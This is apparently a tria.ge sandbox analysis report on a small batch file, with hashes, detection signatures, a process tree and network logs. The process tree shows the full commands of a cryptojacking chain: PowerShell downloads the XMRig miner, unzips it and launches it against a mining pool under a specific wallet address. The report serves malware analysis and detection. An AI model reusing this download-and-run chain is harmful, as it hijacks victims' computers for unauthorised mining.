Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-1703-x64
10tesy - Copy (11).bat
windows10-1703-x64
10tesy - Copy (12).bat
windows10-1703-x64
10tesy - Copy (13).bat
windows10-1703-x64
10tesy - Copy (14).bat
windows10-1703-x64
10tesy - Copy (2).bat
windows10-1703-x64
10tesy - Copy (3).bat
windows10-1703-x64
10tesy - Copy (4).bat
windows10-1703-x64
10tesy - Copy (5).bat
windows10-1703-x64
10tesy - Copy (6).bat
windows10-1703-x64
10tesy - Copy (7).bat
windows10-1703-x64
10tesy - Copy (8).bat
windows10-1703-x64
10tesy - Copy (9).bat
windows10-1703-x64
10tesy - Copy.bat
windows10-1703-x64
10tesy.bat
windows10-1703-x64
10Analysis
-
max time kernel
1794s -
max time network
1806s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
30/12/2023, 07:23 UTC
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10-20231220-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10-20231220-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10-20231215-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10-20231215-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10-20231215-en
General
-
Target
tesy - Copy.bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral14/files/0x000600000001ac25-119.dat family_xmrig behavioral14/files/0x000600000001ac25-119.dat xmrig behavioral14/memory/5088-122-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-123-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-126-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-127-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-130-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-131-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-132-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-133-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-134-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-135-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-136-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-137-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-138-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-139-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-140-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-141-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-142-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-143-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-144-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-145-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-146-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-147-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-148-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-149-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-150-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-151-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-152-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-153-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-154-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-155-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-156-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-157-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-158-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-159-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-160-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-161-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-162-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-163-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-164-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-165-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-166-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-167-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-168-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-169-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-170-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-171-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-172-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-173-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-174-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-175-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-176-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-177-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-178-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-179-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-180-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-181-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-182-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-183-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-184-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-185-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-186-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-187-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 5044 powershell.exe 6 5044 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5088 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 1844 powershell.exe 1844 powershell.exe 1844 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 640 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeLockMemoryPrivilege 5088 xmrig.exe Token: SeLockMemoryPrivilege 5088 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5088 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 8 wrote to memory of 5044 8 cmd.exe 30 PID 8 wrote to memory of 5044 8 cmd.exe 30 PID 8 wrote to memory of 1844 8 cmd.exe 74 PID 8 wrote to memory of 1844 8 cmd.exe 74 PID 8 wrote to memory of 5088 8 cmd.exe 75 PID 8 wrote to memory of 5088 8 cmd.exe 75
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5088
-
Network
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A140.82.121.4
-
GEThttps://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zippowershell.exeRemote address:140.82.121.4:443RequestGET /xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip HTTP/1.1
Host: github.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Date: Sat, 30 Dec 2023 07:24:57 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com support.github.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C286:208389:E61212D:E98B35F:658FC5CB
-
Remote address:8.8.8.8:53Requestobjects.githubusercontent.comIN AResponseobjects.githubusercontent.comIN A185.199.108.133objects.githubusercontent.comIN A185.199.109.133objects.githubusercontent.comIN A185.199.110.133objects.githubusercontent.comIN A185.199.111.133
-
GEThttps://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-streampowershell.exeRemote address:185.199.108.133:443RequestGET /github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1
Host: objects.githubusercontent.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 3334626
Content-Type: application/octet-stream
Content-MD5: SyJ16N9lcZAJMUoKI6RVWA==
Last-Modified: Thu, 23 Nov 2023 14:15:49 GMT
ETag: "0x8DBEC2EB1771407"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 72337178-c01e-0025-4b17-1e4829000000
x-ms-version: 2020-04-08
x-ms-creation-time: Thu, 23 Nov 2023 14:15:49 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
Content-Disposition: attachment; filename=xmrig-6.21.0-gcc-win64.zip
x-ms-server-encrypted: true
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Sat, 30 Dec 2023 07:24:59 GMT
Age: 3326
X-Served-By: cache-iad-kiad7000110-IAD, cache-lcy-eglc8600035-LCY
X-Cache: HIT, HIT
X-Cache-Hits: 10174, 1
X-Timer: S1703921099.496240,VS0,VE323
-
Remote address:8.8.8.8:53Request4.121.82.140.in-addr.arpaIN PTRResponse4.121.82.140.in-addr.arpaIN PTRlb-140-82-121-4-fragithubcom
-
Remote address:8.8.8.8:53Request133.108.199.185.in-addr.arpaIN PTRResponse133.108.199.185.in-addr.arpaIN PTRcdn-185-199-108-133githubcom
-
Remote address:8.8.8.8:53Request79.121.231.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpool.hashvault.proIN AResponsepool.hashvault.proIN A95.179.241.203pool.hashvault.proIN A45.76.89.70
-
Remote address:8.8.8.8:53Request203.241.179.95.in-addr.arpaIN PTRResponse203.241.179.95.in-addr.arpaIN PTR95179241203vultrusercontentcom
-
Remote address:8.8.8.8:53Request114.110.16.96.in-addr.arpaIN PTRResponse114.110.16.96.in-addr.arpaIN PTRa96-16-110-114deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request114.110.16.96.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request89.16.208.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request194.178.17.96.in-addr.arpaIN PTRResponse194.178.17.96.in-addr.arpaIN PTRa96-17-178-194deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request180.178.17.96.in-addr.arpaIN PTRResponse180.178.17.96.in-addr.arpaIN PTRa96-17-178-180deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request180.178.17.96.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request180.178.17.96.in-addr.arpaIN PTR
-
140.82.121.4:443https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.ziptls, httppowershell.exe814 B 6.6kB 9 7
HTTP Request
GET https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zipHTTP Response
302 -
185.199.108.133:443https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-streamtls, httppowershell.exe69.1kB 3.3MB 1424 2372
HTTP Request
GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/73696a88-ab95-4bee-8f68-b88d69b97716?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20231230%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231230T072457Z&X-Amz-Expires=300&X-Amz-Signature=4df592d4dca2bad8f19a3b7f81649e1c251df8e75aaad33b4ef61e50e5d19e77&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.0-gcc-win64.zip&response-content-type=application%2Foctet-streamHTTP Response
200 -
29.8kB 67.8kB 231 186
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
140.82.121.4
-
75 B 139 B 1 1
DNS Request
objects.githubusercontent.com
DNS Response
185.199.108.133185.199.109.133185.199.110.133185.199.111.133
-
71 B 115 B 1 1
DNS Request
4.121.82.140.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
133.108.199.185.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
79.121.231.20.in-addr.arpa
-
64 B 96 B 1 1
DNS Request
pool.hashvault.pro
DNS Response
95.179.241.20345.76.89.70
-
73 B 122 B 1 1
DNS Request
203.241.179.95.in-addr.arpa
-
144 B 137 B 2 1
DNS Request
114.110.16.96.in-addr.arpa
DNS Request
114.110.16.96.in-addr.arpa
-
216 B 158 B 3 1
DNS Request
19.229.111.52.in-addr.arpa
DNS Request
19.229.111.52.in-addr.arpa
DNS Request
19.229.111.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
89.16.208.104.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
194.178.17.96.in-addr.arpa
-
216 B 137 B 3 1
DNS Request
180.178.17.96.in-addr.arpa
DNS Request
180.178.17.96.in-addr.arpa
DNS Request
180.178.17.96.in-addr.arpa
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5ef32294976d9291d732045f2c7b75bd9
SHA18d3a27350a4e625f8456b5f1a02e73904165557e
SHA256759e256b19951b0035e2baa428715ff699e7ae35f7671b929ac02b24ca553219
SHA512fa31da6c840290f04634f2e558885a913c78672a4eebc5f8fb08c7269f79f1af586557ee68ede23f37a31a34e507ec7b4307d6cf53fadc7e80d95865063e1e03
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
30KB
MD5e0fd4e23e9c6101b3e26c14a9579b389
SHA1cb0da5f01413e3f6ec3ddb707a2cba3ff5a03e4e
SHA256a6e6773a1dcb9788d9838c2be3fda5fbd422d7931b73c2997598b61dc013aeac
SHA512bc8b1af3472ad5f99b440f61853300ca501341cfef5e6d6c0156331ae0c3be0e788d7663569c1edbd94e083e77c9cf3ca35d28ff339b00805ac6bc373cc618cf
-
Filesize
78KB
MD505687030d6c1ff777ef5f200c6cb3e9d
SHA13ab330585182bb084509873bb8594e7aae48124a
SHA256b404c3f533cf252f51749190bcf028ee93536a7edb49565debe478fd223907e9
SHA51227b8760dc3b2f109e92f8a675dfd28f5cd0d7463fea741e874040ccb30d588a5cbb46b075a6301187e3f714d714a01b3b637206b94bccc9874c15439c9828325